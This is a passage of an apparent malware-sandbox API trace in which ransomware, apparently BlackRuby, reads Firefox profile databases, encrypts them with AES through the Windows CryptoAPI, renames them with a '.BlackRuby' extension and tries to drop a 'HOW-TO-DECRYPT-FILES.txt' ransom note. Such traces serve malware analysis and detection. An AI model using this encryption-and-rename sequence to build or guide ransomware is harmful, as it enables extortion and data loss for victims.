0x0 [0052.180] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2dd0630*, pdwDataLen=0x18eb58*=0x38100, dwBufLen=0x38100 | out: pbData=0x2dd0630*, pdwDataLen=0x18eb58*=0x38100) returned 1 [0052.182] GetLastError () returned 0x0 [0052.192] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b24524*, pdwDataLen=0x18eb70*=0x10, dwBufLen=0x10 | out: pbData=0x1b24524*, pdwDataLen=0x18eb70*=0x10) returned 1 [0052.192] GetLastError () returned 0x0 [0052.192] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b24554*, pdwDataLen=0x18eb78*=0x0, dwBufLen=0x10 | out: pbData=0x1b24554*, pdwDataLen=0x18eb78*=0x10) returned 1 [0052.192] GetLastError () returned 0x0 [0052.194] CryptDestroyKey (hKey=0x360b60) returned 1 [0052.194] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0052.194] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0052.194] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\content-prefs.sqlite", nBufferLength=0x105, lpBuffer=0x18e614, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\content-prefs.sqlite", lpFilePart=0x0) returned 0x5f [0052.194] GetLastError () returned 0x0 [0052.194] SetErrorMode (uMode=0x1) returned 0x0 [0052.194] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\content-prefs.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\content-prefs.sqlite"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0052.196] GetLastError () returned 0xb7 [0052.196] GetFileType (hFile=0x184) returned 0x1 [0052.197] SetErrorMode (uMode=0x0) returned 0x1 [0052.197] GetFileType (hFile=0x184) returned 0x1 [0052.200] CloseHandle (hObject=0x184) returned 1 [0052.200] GetLastError () returned 0xb7 [0052.200] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\content-prefs.sqlite", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\content-prefs.sqlite", lpFilePart=0x0) returned 0x5f [0052.200] GetLastError () returned 0xb7 [0052.200] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_hK95LOLX0Ze5M8c2COmouiRGXY7eJsCtsuvtjAY30jKZ4.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_hK95LOLX0Ze5M8c2COmouiRGXY7eJsCtsuvtjAY30jKZ4.BlackRuby", lpFilePart=0x0) returned 0x8c [0052.200] GetLastError () returned 0xb7 [0052.200] SetErrorMode (uMode=0x1) returned 0x0 [0052.200] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\content-prefs.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\content-prefs.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x18ebb8 | out: lpFileInformation=0x18ebb8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x851984e0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x851984e0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x274fea20, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x38110)) returned 1 [0052.200] GetLastError () returned 0xb7 [0052.200] SetErrorMode (uMode=0x0) returned 0x1 [0052.200] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\content-prefs.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\content-prefs.sqlite"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_hK95LOLX0Ze5M8c2COmouiRGXY7eJsCtsuvtjAY30jKZ4.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\encrypted_hk95lolx0ze5m8c2comouirgxy7ejsctsuvtjay30jkz4.blackruby")) returned 1 [0052.201] GetLastError () returned 0xb7 [0052.201] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x63 [0052.201] GetLastError () returned 0xb7 [0052.201] SetErrorMode (uMode=0x1) returned 0x0 [0052.201] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0052.201] GetLastError () returned 0x5 [0052.202] SetErrorMode (uMode=0x0) returned 0x1 [0052.202] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\cookies.sqlite", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\cookies.sqlite", lpFilePart=0x0) returned 0x59 [0052.202] GetLastError () returned 0x5 [0052.202] SetErrorMode (uMode=0x1) returned 0x0 [0052.202] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\cookies.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cookies.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x1b41bc0 | out: lpFileInformation=0x1b41bc0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x84f831a0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x84f831a0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc0478a0, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0052.203] GetLastError () returned 0x5 [0052.203] SetErrorMode (uMode=0x0) returned 0x1 [0052.203] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\cookies.sqlite", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\cookies.sqlite", lpFilePart=0x0) returned 0x59 [0052.203] GetLastError () returned 0x5 [0052.203] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\cookies.sqlite", nBufferLength=0x105, lpBuffer=0x18e60c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\cookies.sqlite", lpFilePart=0x0) returned 0x59 [0052.203] GetLastError () returned 0x5 [0052.203] SetErrorMode (uMode=0x1) returned 0x0 [0052.203] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\cookies.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cookies.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0052.203] GetLastError () returned 0x0 [0052.203] GetFileType (hFile=0x184) returned 0x1 [0052.203] SetErrorMode (uMode=0x0) returned 0x1 [0052.203] GetFileType (hFile=0x184) returned 0x1 [0052.203] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ebc0 | out: lpFileSizeHigh=0x18ebc0*=0x0) returned 0x80000 [0052.203] GetLastError () returned 0x0 [0052.207] ReadFile (in: hFile=0x184, lpBuffer=0x2c008d0, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x18eb68, lpOverlapped=0x0 | out: lpBuffer=0x2c008d0*, lpNumberOfBytesRead=0x18eb68*=0x80000, lpOverlapped=0x0) returned 1 [0052.222] GetLastError () returned 0x0 [0052.222] CloseHandle (hObject=0x184) returned 1 [0052.222] GetLastError () returned 0x0 [0052.225] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\cookies.sqlite", nBufferLength=0x105, lpBuffer=0x18e71c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\cookies.sqlite", lpFilePart=0x0) returned 0x59 [0052.225] GetLastError () returned 0x0 [0052.225] SetErrorMode (uMode=0x1) returned 0x0 [0052.225] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\cookies.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cookies.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x18ebd0 | out: lpFileInformation=0x18ebd0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x84f831a0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x84f831a0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc0478a0, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0052.225] GetLastError () returned 0x0 [0052.225] SetErrorMode (uMode=0x0) returned 0x1 [0052.225] CryptAcquireContextW (in: phProv=0x18eb30, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18eb30*=0x37c818) returned 1 [0052.226] GetLastError () returned 0x0 [0052.260] CryptImportKey (in: hProv=0x37c818, pbData=0x1b9decc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb0c | out: phKey=0x18eb0c*=0x360a20) returned 1 [0052.260] GetLastError () returned 0x0 [0052.260] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0052.260] GetLastError () returned 0x0 [0052.265] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0052.265] GetLastError () returned 0x0 [0052.265] CryptDuplicateKey (in: hKey=0x360a20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eac8 | out: phKey=0x18eac8*=0x360ae0) returned 1 [0052.265] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0052.265] GetLastError () returned 0x0 [0052.265] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x4, pbData=0x1bcaf18*=0x1, dwFlags=0x0) returned 1 [0052.265] GetLastError () returned 0x0 [0052.265] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x1, pbData=0x1bcaee4, dwFlags=0x0) returned 1 [0052.265] GetLastError () returned 0x0 [0052.267] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d00a10*, pdwDataLen=0x18eb58*=0x80100, dwBufLen=0x80100 | out: pbData=0x2d00a10*, pdwDataLen=0x18eb58*=0x80100) returned 1 [0052.271] GetLastError () returned 0x0 [0052.275] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bcaf74*, pdwDataLen=0x18eb70*=0x10, dwBufLen=0x10 | out: pbData=0x1bcaf74*, pdwDataLen=0x18eb70*=0x10) returned 1 [0052.275] GetLastError () returned 0x0 [0052.275] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bcafa4*, pdwDataLen=0x18eb78*=0x0, dwBufLen=0x10 | out: pbData=0x1bcafa4*, pdwDataLen=0x18eb78*=0x10) returned 1 [0052.275] GetLastError () returned 0x0 [0052.293] CryptDestroyKey (hKey=0x360a20) returned 1 [0052.293] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0052.293] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0052.293] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\cookies.sqlite", nBufferLength=0x105, lpBuffer=0x18e614, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\cookies.sqlite", lpFilePart=0x0) returned 0x59 [0052.293] GetLastError () returned 0x0 [0052.293] SetErrorMode (uMode=0x1) returned 0x0 [0052.293] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\cookies.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cookies.sqlite"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0052.297] GetLastError () returned 0xb7 [0052.297] GetFileType (hFile=0x184) returned 0x1 [0052.297] SetErrorMode (uMode=0x0) returned 0x1 [0052.297] GetFileType (hFile=0x184) returned 0x1 [0052.305] CloseHandle (hObject=0x184) returned 1 [0052.305] GetLastError () returned 0xb7 [0052.305] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\cookies.sqlite", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\cookies.sqlite", lpFilePart=0x0) returned 0x59 [0052.305] GetLastError () returned 0xb7 [0052.305] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_aqmIVLTCu3YgwiKoYVyB3thuicRC9fkGp0IVsXqvoM.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_aqmIVLTCu3YgwiKoYVyB3thuicRC9fkGp0IVsXqvoM.BlackRuby", lpFilePart=0x0) returned 0x89 [0052.305] GetLastError () returned 0xb7 [0052.305] SetErrorMode (uMode=0x1) returned 0x0 [0052.305] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\cookies.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cookies.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x18ebb8 | out: lpFileInformation=0x18ebb8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x84f831a0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x84f831a0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x276093c0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x80110)) returned 1 [0052.305] GetLastError () returned 0xb7 [0052.305] SetErrorMode (uMode=0x0) returned 0x1 [0052.305] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\cookies.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cookies.sqlite"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_aqmIVLTCu3YgwiKoYVyB3thuicRC9fkGp0IVsXqvoM.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\encrypted_aqmivltcu3ygwikoyvyb3thuicrc9fkgp0ivsxqvom.blackruby")) returned 1 [0052.306] GetLastError () returned 0xb7 [0052.306] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x63 [0052.306] GetLastError () returned 0xb7 [0052.306] SetErrorMode (uMode=0x1) returned 0x0 [0052.306] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0052.306] GetLastError () returned 0x5 [0052.307] SetErrorMode (uMode=0x0) returned 0x1 [0052.307] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\downloads.sqlite", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\downloads.sqlite", lpFilePart=0x0) returned 0x5b [0052.307] GetLastError () returned 0x5 [0052.307] SetErrorMode (uMode=0x1) returned 0x0 [0052.307] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\downloads.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\downloads.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x1b41934 | out: lpFileInformation=0x1b41934*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c6aeea0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x8c6aeea0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xd38df610, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x18000)) returned 1 [0052.308] GetLastError () returned 0x5 [0052.308] SetErrorMode (uMode=0x0) returned 0x1 [0052.308] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\downloads.sqlite", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\downloads.sqlite", lpFilePart=0x0) returned 0x5b [0052.308] GetLastError () returned 0x5 [0052.308] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\downloads.sqlite", nBufferLength=0x105, lpBuffer=0x18e60c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\downloads.sqlite", lpFilePart=0x0) returned 0x5b [0052.308] GetLastError () returned 0x5 [0052.308] SetErrorMode (uMode=0x1) returned 0x0 [0052.308] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\downloads.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\downloads.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0052.308] GetLastError () returned 0x0 [0052.308] GetFileType (hFile=0x184) returned 0x1 [0052.308] SetErrorMode (uMode=0x0) returned 0x1 [0052.308] GetFileType (hFile=0x184) returned 0x1 [0052.308] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ebc0 | out: lpFileSizeHigh=0x18ebc0*=0x0) returned 0x18000 [0052.308] GetLastError () returned 0x0 [0052.309] ReadFile (in: hFile=0x184, lpBuffer=0x2b68580, nNumberOfBytesToRead=0x18000, lpNumberOfBytesRead=0x18eb68, lpOverlapped=0x0 | out: lpBuffer=0x2b68580*, lpNumberOfBytesRead=0x18eb68*=0x18000, lpOverlapped=0x0) returned 1 [0052.312] GetLastError () returned 0x0 [0052.312] CloseHandle (hObject=0x184) returned 1 [0052.312] GetLastError () returned 0x0 [0052.313] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\downloads.sqlite", nBufferLength=0x105, lpBuffer=0x18e71c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\downloads.sqlite", lpFilePart=0x0) returned 0x5b [0052.313] GetLastError () returned 0x0 [0052.313] SetErrorMode (uMode=0x1) returned 0x0 [0052.313] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\downloads.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\downloads.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x18ebd0 | out: lpFileInformation=0x18ebd0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c6aeea0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x8c6aeea0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xd38df610, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x18000)) returned 1 [0052.313] GetLastError () returned 0x0 [0052.313] SetErrorMode (uMode=0x0) returned 0x1 [0052.313] CryptAcquireContextW (in: phProv=0x18eb30, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18eb30*=0x37c818) returned 1 [0052.314] GetLastError () returned 0x0 [0052.347] CryptImportKey (in: hProv=0x37c818, pbData=0x1b9dce0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb0c | out: phKey=0x18eb0c*=0x360f60) returned 1 [0052.348] GetLastError () returned 0x0 [0052.348] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0052.348] GetLastError () returned 0x0 [0052.352] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0052.353] GetLastError () returned 0x0 [0052.353] CryptDuplicateKey (in: hKey=0x360f60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eac8 | out: phKey=0x18eac8*=0x360ee0) returned 1 [0052.353] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0052.353] GetLastError () returned 0x0 [0052.353] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x4, pbData=0x1bcad2c*=0x1, dwFlags=0x0) returned 1 [0052.353] GetLastError () returned 0x0 [0052.353] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x1, pbData=0x1bcacf8, dwFlags=0x0) returned 1 [0052.353] GetLastError () returned 0x0 [0052.353] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2b986c0*, pdwDataLen=0x18eb58*=0x18100, dwBufLen=0x18100 | out: pbData=0x2b986c0*, pdwDataLen=0x18eb58*=0x18100) returned 1 [0052.354] GetLastError () returned 0x0 [0052.354] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bcad88*, pdwDataLen=0x18eb70*=0x10, dwBufLen=0x10 | out: pbData=0x1bcad88*, pdwDataLen=0x18eb70*=0x10) returned 1 [0052.354] GetLastError () returned 0x0 [0052.354] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bcadb8*, pdwDataLen=0x18eb78*=0x0, dwBufLen=0x10 | out: pbData=0x1bcadb8*, pdwDataLen=0x18eb78*=0x10) returned 1 [0052.354] GetLastError () returned 0x0 [0052.356] CryptDestroyKey (hKey=0x360f60) returned 1 [0052.356] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0052.356] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0052.356] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\downloads.sqlite", nBufferLength=0x105, lpBuffer=0x18e614, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\downloads.sqlite", lpFilePart=0x0) returned 0x5b [0052.356] GetLastError () returned 0x0 [0052.356] SetErrorMode (uMode=0x1) returned 0x0 [0052.356] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\downloads.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\downloads.sqlite"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0052.357] GetLastError () returned 0xb7 [0052.357] GetFileType (hFile=0x184) returned 0x1 [0052.357] SetErrorMode (uMode=0x0) returned 0x1 [0052.357] GetFileType (hFile=0x184) returned 0x1 [0052.359] CloseHandle (hObject=0x184) returned 1 [0052.359] GetLastError () returned 0xb7 [0052.359] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\downloads.sqlite", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\downloads.sqlite", lpFilePart=0x0) returned 0x5b [0052.359] GetLastError () returned 0xb7 [0052.359] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_AYqjeTdpZIwJqW3Kq4Nf7mX8ARgAqNV4ByNMwdD6v0n.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: 